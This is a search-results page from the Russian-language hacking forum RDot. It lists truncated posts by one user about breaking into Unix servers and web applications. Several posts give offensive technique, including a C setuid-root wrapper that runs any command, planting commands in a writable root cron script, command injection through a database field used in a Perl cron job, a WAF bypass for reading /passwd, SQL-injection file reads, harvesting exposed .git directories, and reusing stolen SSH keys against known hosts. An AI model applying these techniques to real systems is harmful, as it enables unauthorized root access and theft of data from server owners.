Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 37.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: romashka_sky
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 02.08.2015, 01:08
Ответов: 4
Просмотров: 10,304
Автор romashka_sky
Если имеется ключи (чаще всего в той же ~/.ssh/)...

Если имеется ключи (чаще всего в той же ~/.ssh/) можно попробовать с использованием ключа подключиться к хостам, указанным в known_hosts.
Раздел: Повышение привилегий/Privilege escalation 20.07.2015, 16:10
Ответов: 1,219
Просмотров: 807,070
Автор romashka_sky
пользователь может быть в sudoers без ввода...

пользователь может быть в sudoers без ввода пароля, да и приватная информация может что-то подсказать (тот же .bash_history)
Раздел: Мировые новости/World news 13.07.2015, 18:43
Ответов: 9
Просмотров: 10,096
Автор romashka_sky
https://github.com/informationextraction?tab=repos...

https://github.com/informationextraction?tab=repositories
Раздел: Криптография/Cryptography 03.07.2015, 21:25
Ответов: 6
Просмотров: 10,700
Автор romashka_sky
XOR YKEY@1Z8F$M

XOR YKEY@1Z8F$M
Раздел: Обратная связь/Feedback 28.05.2015, 02:14
Ответов: 490
Просмотров: 342,960
Автор romashka_sky
https://rdot.net/forum как связан с этим форумом?

https://rdot.net/forum как связан с этим форумом?
Раздел: Повышение привилегий/Privilege escalation 22.05.2015, 15:04
Ответов: 6
Просмотров: 12,796
Автор romashka_sky
Так и должно быть. При логине root поставит...

Так и должно быть. При логине root поставит suid-бит для /bin/sh.
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.03.2015, 12:18
Ответов: 8
Просмотров: 12,213
Автор romashka_sky
Возможно, SELinux

Возможно, SELinux
Раздел: Web-среда/Web-applications 26.01.2015, 23:58
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
Если nginx работает как реверс-прокси для,...

Если nginx работает как реверс-прокси для, например, Apache, то можно попытать счастья - просканировать открытые порты, возможно, Apache доступен на другом порту(81, 8000, 8080, 8888, etc.) и...
Раздел: Web-среда/Web-applications 19.11.2014, 19:02
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
https://rdot.org/forum/showthread.php?p=32395#post...

https://rdot.org/forum/showthread.php?p=32395#post32395
Раздел: Повышение привилегий/Privilege escalation 26.06.2014, 11:57
Ответов: 1,219
Просмотров: 807,070
Автор romashka_sky
-rwsrwxrwx 1 root root 2 Jun 26 10:39...

-rwsrwxrwx 1 root root 2 Jun 26 10:39 test
Можно ли поднять привилегии до root, используя файл с такими правами доступа?

Пробовал перезаписывать содержимое, но при модификации файла не...
Раздел: *nix-like 10.11.2013, 12:15
Ответов: 167
Просмотров: 147,057
Автор romashka_sky
скорее всего так и было, спасибо

скорее всего так и было, спасибо
Раздел: *nix-like 04.11.2013, 23:24
Ответов: 167
Просмотров: 147,057
Автор romashka_sky
не обнаружил признаков ротации. Может ли это быть...

не обнаружил признаков ротации. Может ли это быть просто из-за нестабильной работы системы после применения local-root эксплоита (https://rdot.org/forum/showpost.php?p=26917&postcount=17)?
Раздел: *nix-like 02.11.2013, 13:25
Ответов: 167
Просмотров: 147,057
Автор romashka_sky
Чем можно объяснить такое поведение? $ pwd...

Чем можно объяснить такое поведение?

$ pwd 2>&1
/tmp/e
ls -al 2>&1
total 60
drwxr-xr-x 2 www wheel 512 Nov 2 12:05 .
drwxrwxrwt 11 root wheel 1536 Nov 2 11:58 ..
-rwsr-sr-x 1...
Раздел: Web-среда/Web-applications 21.09.2013, 21:55
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
Allow from 1.2.3.4 # разрешённый IP Satisfy Any

Allow from 1.2.3.4 # разрешённый IP
Satisfy Any
Раздел: Web-среда/Web-applications 10.09.2013, 20:05
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
можно попробовать добавить слеши с точками, WAF...

можно попробовать добавить слеши с точками, WAF пропустит, т.к. будет токен "/passwd/", а PHP обрежет(вот тут в зависимости от версии PHP)
http://raz0r.name/articles/null-byte-alternative/

P.S....
Раздел: Повышение привилегий/Privilege escalation 16.08.2013, 19:38
Ответов: 1,219
Просмотров: 807,070
Автор romashka_sky
Faaax, /etc/cron.hourly/createnewtorrent.pl ...

Faaax, /etc/cron.hourly/createnewtorrent.pl

`(echo "Creating torrent for film ID $row[0] $row[1]")>>/var/log/torrent.log`;

$row[1] берётся из базы (поле NAME_ENG), к которой есть доступ. Если...
Раздел: Повышение привилегий/Privilege escalation 10.08.2013, 18:24
Ответов: 1,219
Просмотров: 807,070
Автор romashka_sky
#include <stdio.h> int main(int argc, char...

#include <stdio.h>
int main(int argc, char *argv[])
{setuid(0);setgid(0);system(argv[1]);return 0;}

создаёшь файл с таким содержанием в /tmp/suid.c
делаешь запускаемый бинарник
gcc /tmp/suid.c...
Раздел: Повышение привилегий/Privilege escalation 10.08.2013, 18:16
Ответов: 1,219
Просмотров: 807,070
Автор romashka_sky
Wink nicols, для редактирования...

nicols, для редактирования /etc/cron.hourly/larson прав хватает, так что дописывай в него команды создания суидника(ну или любые команды, всё выполнится от root) и жди своего часа
Раздел: Web-среда/Web-applications 25.07.2013, 19:13
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
совсем забыл, LOAD_FILE не может читать из файлов...

совсем забыл, LOAD_FILE не может читать из файлов такого типа:(
Раздел: Web-среда/Web-applications 25.07.2013, 16:00
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
Можно попробовать прочитать /proc/net/tcp ...

Можно попробовать прочитать
/proc/net/tcp
столбец
local_address
строчки, похожие на
XXXXXXXX:0CEA
XXXXXXXX - IP-адрес в hex (4 байта, справа налево)
0CEA - порт 3306 в hex

PS: да и вообще...
Раздел: *nix-like 19.07.2013, 10:05
Ответов: 13
Просмотров: 20,269
Автор romashka_sky
https://rdot.org/forum/showthread.php?t=2720 ...

https://rdot.org/forum/showthread.php?t=2720
выбираете нужную вам архитектуру,
меняете
return execl("/bin/bash", "-sh", NULL);
на
return execl("/bin/bash", "bash", "-c", "echo '#include...
Раздел: Web-среда/Web-applications 13.07.2013, 22:22
Ответов: 105
Важно: Шпаргалка
Просмотров: 201,839
Автор romashka_sky
Если есть доступ из веба к директории репозитория...

Если есть доступ из веба к директории репозитория .git (скачивается http://example.com/.git/index). (Редко, но встречается)

$ git init
скачиваем http://example.com/.git/index и кладём его в...
Раздел: Web-среда/Web-applications 13.07.2013, 14:07
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
NameSpace, блокировка производится самим...

NameSpace, блокировка производится самим скриптом, и в выражении "LOCK TABLES ..." указываются все таблицы с алиасами, которые блокируются для эксклюзивного доступа, и только с ними можно будет...
Раздел: Web-среда/Web-applications 13.07.2013, 13:40
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
насколько я знаю, что для подзапросов, union,...

насколько я знаю, что для подзапросов, union, join таблицы, входящие в sql-выражение должны быть заблокированы на чтение/запись. Если используется одна таблица, то она должна блокироваться с алиасом,...
Раздел: Web-среда/Web-applications 13.07.2013, 09:23
Ответов: 3,618
Просмотров: 2,431,880
Автор romashka_sky
При использовании блокировок таблиц(lock)...

При использовании блокировок таблиц(lock) обращаться можно только к заблокированным таблицам(алиасам). Например
LOCK TABLES t1, t2 WRITE
SELECT * FROM t3 даст такую ошибку
Показано с 1 по 25 из 37.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot